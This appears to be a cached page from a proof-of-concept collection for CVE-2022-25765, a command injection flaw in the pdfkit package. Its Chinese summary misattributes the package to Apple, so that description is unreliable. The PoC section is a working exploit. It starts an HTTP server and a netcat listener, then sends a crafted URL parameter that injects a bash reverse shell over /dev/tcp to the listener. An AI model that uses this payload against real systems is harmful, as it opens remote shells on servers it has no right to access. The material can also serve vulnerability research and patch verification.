CVE-2022-25765 PoC — Apple PDFKit 安全漏洞

Source

https://github.com/lekosbelas/PDFkit-CMD-Injection

Associated Vulnerability

Title:Apple PDFKit 安全漏洞 (CVE-2022-25765)
Description:Apple PDFKit是美国苹果（Apple）公司的其中的一个PDF文档生成组件。 Apple PDFKit 存在安全漏洞，攻击者可利用该漏洞执行非法命令。

Description

CVE-2022-25765 pdfkit 0.8.6 command injection.

Readme

# PDFkit-CMD-Injection 

### CVE-2022-25765 Detail

#### Description
The package pdfkit from 0.0.0 are vulnerable to Command Injection where the URL is not properly sanitized.



### PoC

#### Start a HTTP server
<pre>
1- python3 -m http.server 80
</pre>
#### Start a netcat listener
<pre>
2- nc -lnvp 'Target Port'
</pre>
#### Make a request 
<pre>
3- http://"TARGET_ADDRESS:Target PORT"//?name=#{'%20`bash -c 'exec bash -i &>/dev/tcp/"Target_ADRESS/LISTENING_PORT"<&1'`'}
</pre>

File Snapshot


 [4.0K]  /data/pocs/bd9b42d3eed4c97f7667fb4bacc09bd64dc78253
├── [ 481]  README.md
├── [117K]  Screenshot 2023-02-21 at 19.42.13.png
├── [ 71K]  Screenshot 2023-02-21 at 19.44.07.png
└── [104K]  Screenshot 2023-02-21 at 19.45.01.png

0 directories, 4 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!